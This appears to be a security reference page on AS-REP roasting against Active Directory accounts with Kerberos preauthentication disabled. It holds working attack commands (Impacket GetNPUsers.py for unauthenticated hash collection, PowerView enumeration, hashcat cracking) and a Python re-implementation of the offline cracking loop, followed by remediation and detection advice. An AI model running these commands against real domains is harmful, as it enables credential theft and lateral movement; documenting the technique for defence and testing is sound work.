AS-REP Roasting

Description

AS‑REP roasting targets accounts with “Do not require Kerberos preauthentication” set (the DONT_REQ_PREAUTH bit, 0x400000, in userAccountControl). For such an account the KDC answers an AS‑REQ that carries no PA‑ENC‑TIMESTAMP, so anyone who knows the username, authenticated to the domain or not, can obtain an AS‑REP for it. The encrypted part of that AS‑REP is protected with the account’s long‑term key, which is derived directly from the password (for RC4 it is the NT hash itself), so the blob can be cracked offline with no lockouts and no further contact with the domain controller. This commonly affects legacy/service accounts on which the option was set for compatibility or troubleshooting and never remediated.

Examples

Enumerate Vulnerable Users and Request AS‑REPs

Use Impacket’s GetNPUsers.py to pull AS‑REP hashes for users with pre‑auth disabled. With -usersfile and -no-pass it needs no credentials at all, only candidate usernames; given a domain account instead, it locates the flagged users itself via LDAP. Write the hashes with -outputfile rather than a shell redirect, because the tool’s status lines for users that do not have the flag also go to stdout:

GetNPUsers.py corp.local/ -dc-ip 10.0.0.10 -no-pass -usersfile users.txt -format hashcat -outputfile asrep_hashes.txt

The output contains one $krb5asrep$23$user@REALM:… line per flagged user, ready for cracking. The 23 is the RC4‑HMAC encryption type the tool requests by default; a domain that has disabled RC4 answers with AES instead (etype 17 or 18), which still cracks but far more slowly.

Enumerate with PowerView/native tooling:

# PowerView
Get-DomainUser -PreauthNotRequired | Select-Object SamAccountName, userAccountControl

# Native AD module (DoesNotRequirePreAuth is the 0x400000 bit of userAccountControl)
Get-ADUser -Filter 'DoesNotRequirePreAuth -eq $true' -Properties DoesNotRequirePreAuth | Select-Object SamAccountName

Crack AS‑REP Hashes

Crack with hashcat: mode 18200 is Kerberos 5 AS‑REP etype 23 (RC4); AES AS‑REPs (etype 17 and 18) use modes 32100 and 32200 in hashcat 6.2.6 or later. The username is already embedded in the $krb5asrep$ line, so --username must not be used, and best64 is a rule file, not a wordlist:

hashcat -m 18200 asrep_hashes.txt wordlists/rockyou.txt -r rules/best64.rule

Recovered credentials confirm exploitability. Accounts that still carry this flag are typically old service accounts that were never right‑sized, so the recovered password often opens lateral movement paths.
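The check hashcat performs here, and the reason the Description calls the AS‑REP crackable offline, is shown by the following added example. It is not part of the original page and is not Impacket or hashcat code: it re‑implements the RFC 4757 RC4‑HMAC encryption of the AS‑REP enc‑part in pure Python (MD4 for the NT hash, HMAC‑MD5 for key derivation and the checksum, RC4 for the stream cipher) so that it runs without a domain. The account name, realm, password and enc‑part bytes are constructed sample data; a real AS‑REP’s enc‑part is a DER EncASRepPart and its confounder is random.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4, written out because OpenSSL 3 builds of hashlib often lack md4."""
    def rol(x, n):
        return ((x << n) | (x >> (32 - n))) & MASK
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rounds = (
        (F, 0x00000000, list(range(16)), (3, 7, 11, 19)),
        (G, 0x5A827999, [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15], (3, 5, 9, 13)),
        (H, 0x6ED9EBA1, [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15], (3, 9, 11, 15)),
    )
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    msg = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", len(msg) * 8)
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                # Rotating the register names turns the 48 MD4 steps into one loop.
                a, b, c, d = d, rol((a + fn(b, c, d) + X[idx] + k) & MASK, shifts[i % 4]), b, c
        h = [(x + y) & MASK for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); for RC4-HMAC this *is* the Kerberos long-term key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


# RFC 4757: the key-usage number, as a 4-byte little-endian int, is the HMAC input.
# The AS-REP enc-part is usage 3, which RC4-HMAC remaps to 8.
ASREP_USAGE = struct.pack("<I", 8)


def rc4_hmac_encrypt(key, plaintext, confounder):
    """What the KDC does; returns (checksum, edata), the two halves of a $krb5asrep$23$ line."""
    ki = hmac.new(key, ASREP_USAGE, hashlib.md5).digest()
    cksum = hmac.new(ki, confounder + plaintext, hashlib.md5).digest()
    ke = hmac.new(ki, cksum, hashlib.md5).digest()
    return cksum, rc4(ke, confounder + plaintext)


def asrep_key_matches(key, cksum, edata):
    """Offline check: derive Ke from the candidate key, decrypt, recompute the HMAC.
    The checksum travels in the clear, so a correct guess verifies with no KDC contact."""
    ki = hmac.new(key, ASREP_USAGE, hashlib.md5).digest()
    ke = hmac.new(ki, cksum, hashlib.md5).digest()
    plain = rc4(ke, edata)
    return hmac.compare_digest(hmac.new(ki, plain, hashlib.md5).digest(), cksum)


def make_asrep_hash(user, realm, password):
    """Constructed sample in hashcat format; enc-part and confounder are stand-ins."""
    enc_part = b"\x79\x81" + b"EncASRepPart stand-in (session key, ticket times)"
    confounder = bytes(range(8))  # a real KDC uses 8 random bytes here
    cksum, edata = rc4_hmac_encrypt(nt_hash(password), enc_part, confounder)
    return f"$krb5asrep$23${user}@{realm}:{cksum.hex()}${edata.hex()}"


def crack_asrep(hash_line, wordlist):
    """The loop hashcat -m 18200 runs: one MD4 and three HMAC-MD5s per candidate."""
    if not hash_line.startswith("$krb5asrep$23$"):
        raise ValueError("only etype 23 (RC4-HMAC) is handled here; AES uses a PBKDF2 key")
    blob = hash_line.split(":", 1)[1]
    cksum_hex, edata_hex = blob.split("$")
    cksum, edata = bytes.fromhex(cksum_hex), bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if asrep_key_matches(nt_hash(candidate), cksum, edata):
            return candidate
    return None


if __name__ == "__main__":
    line = make_asrep_hash("svc_legacy", "CORP.LOCAL", "Summer2024!")
    print(line)
    print("recovered:", crack_asrep(line, ["Password1", "Welcome1", "Summer2024!"]))
```

Running it prints a $krb5asrep$23$ line in the layout GetNPUsers.py -format hashcat writes (16‑byte checksum, then the RC4 ciphertext) and recovers the password from a three‑word list. Note what is absent: no salt, no iteration count, one MD4 and three HMAC‑MD5 computations per guess. That is why RC4 AS‑REPs fall so quickly, while AES (etype 17/18) keys come from PBKDF2 with 4096 iterations over a salted password and cost orders of magnitude more per guess.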

Remediation

  1. Re‑enable Kerberos preauthentication
    • Audit and clear the DONT_REQ_PREAUTH flag (0x400000 in userAccountControl) on every account that carries it; per account, Set‑ADAccountControl with DoesNotRequirePreAuth set to false does it.
    • Alert on changes to this flag: event 4738 (a user account was changed) records the old and new userAccountControl values. There are very few legitimate cases, essentially only ancient non‑Windows Kerberos clients that cannot do pre‑authentication.
  2. Reduce blast radius of exposed accounts
    • Rotate passwords immediately: the AS‑REP is only as strong as the password, and a long random one defeats offline cracking even while the flag is still set. Remove excessive privileges.
    • Migrate legacy services to gMSA/MSA (long, random, automatically rotated passwords) or application identities.
  3. Monitor and hunt
    • Watch 4768 with Pre‑Authentication Type 0 and a success Result Code (0x0); failures with 0x19 (KDC_ERR_PREAUTH_REQUIRED) are the first leg of a normal logon, not roasting. Prioritise one source IP asking for many target accounts in a short window, unusual IPs, and Ticket Encryption Type 0x17 (RC4).
    • Seed honeypot users with the flag enabled, no real privileges and a long random password; any 4768 for such an account is reconnaissance and actionable on its own.